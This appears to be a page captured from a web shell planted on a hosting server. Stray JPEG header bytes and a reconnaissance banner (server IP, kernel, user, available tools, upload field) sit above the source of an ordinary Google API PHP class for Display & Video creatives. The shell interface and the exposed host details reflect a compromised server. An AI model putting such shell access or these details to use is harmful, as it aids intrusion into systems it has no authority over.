����JFIF��x�x����'
Server IP : 78.140.185.180 / Your IP : 216.73.216.45 Web Server : LiteSpeed System : Linux cpanel13.v.fozzy.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64 User : builderbox ( 1072) PHP Version : 7.3.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/builderbox/www/vendor/google/apiclient-services/src/Google/Service/DisplayVideo/ |
Upload File : |
<?php /* * Copyright 2014 Google Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); you may not * use this file except in compliance with the License. You may obtain a copy of * the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the * License for the specific language governing permissions and limitations under * the License. */ class Google_Service_DisplayVideo_Creative extends Google_Collection { protected $collection_key = 'transcodes'; protected $additionalDimensionsType = 'Google_Service_DisplayVideo_Dimensions'; protected $additionalDimensionsDataType = 'array'; public $advertiserId; public $appendedTag; protected $assetsType = 'Google_Service_DisplayVideo_AssetAssociation'; protected $assetsDataType = 'array'; public $cmPlacementId; protected $cmTrackingAdType = 'Google_Service_DisplayVideo_CmTrackingAd'; protected $cmTrackingAdDataType = ''; public $companionCreativeIds; protected $counterEventsType = 'Google_Service_DisplayVideo_CounterEvent'; protected $counterEventsDataType = 'array'; public $createTime; public $creativeAttributes; public $creativeId; public $creativeType; protected $dimensionsType = 'Google_Service_DisplayVideo_Dimensions'; protected $dimensionsDataType = ''; public $displayName; public $dynamic; public $entityStatus; protected $exitEventsType = 'Google_Service_DisplayVideo_ExitEvent'; protected $exitEventsDataType = 'array'; public $expandOnHover; public $expandingDirection; public $hostingSource; public $html5Video; public $iasCampaignMonitoring; public $integrationCode; public $jsTrackerUrl; public $lineItemIds; public $mediaDuration; public $name; public $notes; protected $obaIconType = 'Google_Service_DisplayVideo_ObaIcon'; protected $obaIconDataType = ''; protected $progressOffsetType = 'Google_Service_DisplayVideo_AudioVideoOffset'; protected $progressOffsetDataType = ''; public $requireHtml5; public $requireMraid; public $requirePingForAttribution; protected $reviewStatusType = 'Google_Service_DisplayVideo_ReviewStatusInfo'; protected $reviewStatusDataType = ''; protected $skipOffsetType = 'Google_Service_DisplayVideo_AudioVideoOffset'; protected $skipOffsetDataType = ''; public $skippable; public $thirdPartyTag; protected $thirdPartyUrlsType = 'Google_Service_DisplayVideo_ThirdPartyUrl'; protected $thirdPartyUrlsDataType = 'array'; protected $timerEventsType = 'Google_Service_DisplayVideo_TimerEvent'; protected $timerEventsDataType = 'array'; public $trackerUrls; protected $transcodesType = 'Google_Service_DisplayVideo_Transcode'; protected $transcodesDataType = 'array'; protected $universalAdIdType = 'Google_Service_DisplayVideo_UniversalAdId'; protected $universalAdIdDataType = ''; public $updateTime; public $vastTagUrl; public $vpaid; /** * @param Google_Service_DisplayVideo_Dimensions */ public function setAdditionalDimensions($additionalDimensions) { $this->additionalDimensions = $additionalDimensions; } /** * @return Google_Service_DisplayVideo_Dimensions */ public function getAdditionalDimensions() { return $this->additionalDimensions; } public function setAdvertiserId($advertiserId) { $this->advertiserId = $advertiserId; } public function getAdvertiserId() { return $this->advertiserId; } public function setAppendedTag($appendedTag) { $this->appendedTag = $appendedTag; } public function getAppendedTag() { return $this->appendedTag; } /** * @param Google_Service_DisplayVideo_AssetAssociation */ public function setAssets($assets) { $this->assets = $assets; } /** * @return Google_Service_DisplayVideo_AssetAssociation */ public function getAssets() { return $this->assets; } public function setCmPlacementId($cmPlacementId) { $this->cmPlacementId = $cmPlacementId; } public function getCmPlacementId() { return $this->cmPlacementId; } /** * @param Google_Service_DisplayVideo_CmTrackingAd */ public function setCmTrackingAd(Google_Service_DisplayVideo_CmTrackingAd $cmTrackingAd) { $this->cmTrackingAd = $cmTrackingAd; } /** * @return Google_Service_DisplayVideo_CmTrackingAd */ public function getCmTrackingAd() { return $this->cmTrackingAd; } public function setCompanionCreativeIds($companionCreativeIds) { $this->companionCreativeIds = $companionCreativeIds; } public function getCompanionCreativeIds() { return $this->companionCreativeIds; } /** * @param Google_Service_DisplayVideo_CounterEvent */ public function setCounterEvents($counterEvents) { $this->counterEvents = $counterEvents; } /** * @return Google_Service_DisplayVideo_CounterEvent */ public function getCounterEvents() { return $this->counterEvents; } public function setCreateTime($createTime) { $this->createTime = $createTime; } public function getCreateTime() { return $this->createTime; } public function setCreativeAttributes($creativeAttributes) { $this->creativeAttributes = $creativeAttributes; } public function getCreativeAttributes() { return $this->creativeAttributes; } public function setCreativeId($creativeId) { $this->creativeId = $creativeId; } public function getCreativeId() { return $this->creativeId; } public function setCreativeType($creativeType) { $this->creativeType = $creativeType; } public function getCreativeType() { return $this->creativeType; } /** * @param Google_Service_DisplayVideo_Dimensions */ public function setDimensions(Google_Service_DisplayVideo_Dimensions $dimensions) { $this->dimensions = $dimensions; } /** * @return Google_Service_DisplayVideo_Dimensions */ public function getDimensions() { return $this->dimensions; } public function setDisplayName($displayName) { $this->displayName = $displayName; } public function getDisplayName() { return $this->displayName; } public function setDynamic($dynamic) { $this->dynamic = $dynamic; } public function getDynamic() { return $this->dynamic; } public function setEntityStatus($entityStatus) { $this->entityStatus = $entityStatus; } public function getEntityStatus() { return $this->entityStatus; } /** * @param Google_Service_DisplayVideo_ExitEvent */ public function setExitEvents($exitEvents) { $this->exitEvents = $exitEvents; } /** * @return Google_Service_DisplayVideo_ExitEvent */ public function getExitEvents() { return $this->exitEvents; } public function setExpandOnHover($expandOnHover) { $this->expandOnHover = $expandOnHover; } public function getExpandOnHover() { return $this->expandOnHover; } public function setExpandingDirection($expandingDirection) { $this->expandingDirection = $expandingDirection; } public function getExpandingDirection() { return $this->expandingDirection; } public function setHostingSource($hostingSource) { $this->hostingSource = $hostingSource; } public function getHostingSource() { return $this->hostingSource; } public function setHtml5Video($html5Video) { $this->html5Video = $html5Video; } public function getHtml5Video() { return $this->html5Video; } public function setIasCampaignMonitoring($iasCampaignMonitoring) { $this->iasCampaignMonitoring = $iasCampaignMonitoring; } public function getIasCampaignMonitoring() { return $this->iasCampaignMonitoring; } public function setIntegrationCode($integrationCode) { $this->integrationCode = $integrationCode; } public function getIntegrationCode() { return $this->integrationCode; } public function setJsTrackerUrl($jsTrackerUrl) { $this->jsTrackerUrl = $jsTrackerUrl; } public function getJsTrackerUrl() { return $this->jsTrackerUrl; } public function setLineItemIds($lineItemIds) { $this->lineItemIds = $lineItemIds; } public function getLineItemIds() { return $this->lineItemIds; } public function setMediaDuration($mediaDuration) { $this->mediaDuration = $mediaDuration; } public function getMediaDuration() { return $this->mediaDuration; } public function setName($name) { $this->name = $name; } public function getName() { return $this->name; } public function setNotes($notes) { $this->notes = $notes; } public function getNotes() { return $this->notes; } /** * @param Google_Service_DisplayVideo_ObaIcon */ public function setObaIcon(Google_Service_DisplayVideo_ObaIcon $obaIcon) { $this->obaIcon = $obaIcon; } /** * @return Google_Service_DisplayVideo_ObaIcon */ public function getObaIcon() { return $this->obaIcon; } /** * @param Google_Service_DisplayVideo_AudioVideoOffset */ public function setProgressOffset(Google_Service_DisplayVideo_AudioVideoOffset $progressOffset) { $this->progressOffset = $progressOffset; } /** * @return Google_Service_DisplayVideo_AudioVideoOffset */ public function getProgressOffset() { return $this->progressOffset; } public function setRequireHtml5($requireHtml5) { $this->requireHtml5 = $requireHtml5; } public function getRequireHtml5() { return $this->requireHtml5; } public function setRequireMraid($requireMraid) { $this->requireMraid = $requireMraid; } public function getRequireMraid() { return $this->requireMraid; } public function setRequirePingForAttribution($requirePingForAttribution) { $this->requirePingForAttribution = $requirePingForAttribution; } public function getRequirePingForAttribution() { return $this->requirePingForAttribution; } /** * @param Google_Service_DisplayVideo_ReviewStatusInfo */ public function setReviewStatus(Google_Service_DisplayVideo_ReviewStatusInfo $reviewStatus) { $this->reviewStatus = $reviewStatus; } /** * @return Google_Service_DisplayVideo_ReviewStatusInfo */ public function getReviewStatus() { return $this->reviewStatus; } /** * @param Google_Service_DisplayVideo_AudioVideoOffset */ public function setSkipOffset(Google_Service_DisplayVideo_AudioVideoOffset $skipOffset) { $this->skipOffset = $skipOffset; } /** * @return Google_Service_DisplayVideo_AudioVideoOffset */ public function getSkipOffset() { return $this->skipOffset; } public function setSkippable($skippable) { $this->skippable = $skippable; } public function getSkippable() { return $this->skippable; } public function setThirdPartyTag($thirdPartyTag) { $this->thirdPartyTag = $thirdPartyTag; } public function getThirdPartyTag() { return $this->thirdPartyTag; } /** * @param Google_Service_DisplayVideo_ThirdPartyUrl */ public function setThirdPartyUrls($thirdPartyUrls) { $this->thirdPartyUrls = $thirdPartyUrls; } /** * @return Google_Service_DisplayVideo_ThirdPartyUrl */ public function getThirdPartyUrls() { return $this->thirdPartyUrls; } /** * @param Google_Service_DisplayVideo_TimerEvent */ public function setTimerEvents($timerEvents) { $this->timerEvents = $timerEvents; } /** * @return Google_Service_DisplayVideo_TimerEvent */ public function getTimerEvents() { return $this->timerEvents; } public function setTrackerUrls($trackerUrls) { $this->trackerUrls = $trackerUrls; } public function getTrackerUrls() { return $this->trackerUrls; } /** * @param Google_Service_DisplayVideo_Transcode */ public function setTranscodes($transcodes) { $this->transcodes = $transcodes; } /** * @return Google_Service_DisplayVideo_Transcode */ public function getTranscodes() { return $this->transcodes; } /** * @param Google_Service_DisplayVideo_UniversalAdId */ public function setUniversalAdId(Google_Service_DisplayVideo_UniversalAdId $universalAdId) { $this->universalAdId = $universalAdId; } /** * @return Google_Service_DisplayVideo_UniversalAdId */ public function getUniversalAdId() { return $this->universalAdId; } public function setUpdateTime($updateTime) { $this->updateTime = $updateTime; } public function getUpdateTime() { return $this->updateTime; } public function setVastTagUrl($vastTagUrl) { $this->vastTagUrl = $vastTagUrl; } public function getVastTagUrl() { return $this->vastTagUrl; } public function setVpaid($vpaid) { $this->vpaid = $vpaid; } public function getVpaid() { return $this->vpaid; } }